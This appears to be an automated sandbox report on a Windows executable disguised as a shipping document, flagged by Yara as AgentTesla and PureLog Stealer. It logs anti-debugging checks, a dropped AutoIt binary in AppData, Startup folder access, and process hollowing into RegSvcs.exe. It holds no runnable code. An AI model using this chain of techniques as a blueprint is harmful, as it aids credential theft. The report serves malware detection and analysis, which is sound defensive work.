Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CF56F FindFirstFileW,FindClose,	0_2_006CF56F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006CF5FA
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006D1B2F
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006D1C8A
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006D1F94
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DB6CA9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00DB60DD
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00DB63F9
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DBEB60
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DBF5FA
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DBF56F FindFirstFileW,FindClose,	2_2_00DBF56F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DC1B2F
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DC1C8A
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00DC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DC1F94

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_0069DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0069DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98977	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 97108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96881	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96414	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96165	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 96047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95900	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95732	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 95062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 94078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 93968	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: RegSvcs.exe, 00000005.00000002.2337618607.0000000005638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<n
Source: RegSvcs.exe, 0000000B.00000002.3395099614.000000000142D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	API call chain: ExitProcess graph end node	graph_0-93192
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006D6AAF BlockInput,

0_2_006D6AAF

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_00683D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00683D19

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_006B3920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

5_2_004019F0

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_0069E01E LoadLibraryA,GetProcAddress,

0_2_0069E01E

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00F05658 mov eax, dword ptr fs:[00000030h]	0_2_00F05658
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00F06CE8 mov eax, dword ptr fs:[00000030h]	0_2_00F06CE8
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_00F06C88 mov eax, dword ptr fs:[00000030h]	0_2_00F06C88
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_012194C8 mov eax, dword ptr fs:[00000030h]	2_2_012194C8
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_0121AB58 mov eax, dword ptr fs:[00000030h]	2_2_0121AB58
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_0121AAF8 mov eax, dword ptr fs:[00000030h]	2_2_0121AAF8
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 4_2_0110E390 mov eax, dword ptr fs:[00000030h]	4_2_0110E390
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 4_2_0110E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0110E3F0
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 4_2_0110CD60 mov eax, dword ptr fs:[00000030h]	4_2_0110CD60

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_006BA66C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006A81AC
Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe	Code function: 0_2_006A8189 SetUnhandledExceptionFilter,	0_2_006A8189
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D98189 SetUnhandledExceptionFilter,	2_2_00D98189
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Code function: 2_2_00D981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D981AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004123F1 SetUnhandledExceptionFilter,	5_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CC6008			Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E25008			Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006BB106 LogonUserW,

0_2_006BB106

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_00683D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00683D19

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C411C SendInput,keybd_event,

0_2_006C411C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C74E7 mouse_event,

0_2_006C74E7

Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\juvenile.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\juvenile.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\juvenile.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

0_2_006BA66C

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006C71FA

Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, juvenile.exe	Binary or memory string: Shell_TrayWnd
Source: MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe, juvenile.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006A65C4 cpuid

0_2_006A65C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

5_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_006D091D

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006FB340 GetUserNameW,

0_2_006FB340

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_006B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_006B1E8E

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Code function: 0_2_0069DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0069DDC0

Source: C:\Users\user\Desktop\MVV ALIADO - S-REQ-19-00064 40ft 1x20.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbff86.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.56f0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2334390218.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2335172794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2336361371.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2337231553.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3396205301.000000000330A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2335172794.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2338131116.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3396205301.0000000003335000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5676, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.2.RegSvcs.exe.3fe6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.4033190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2cbf09e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.5560ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3fe5570.5.unpack, type: UNPACKEDPE
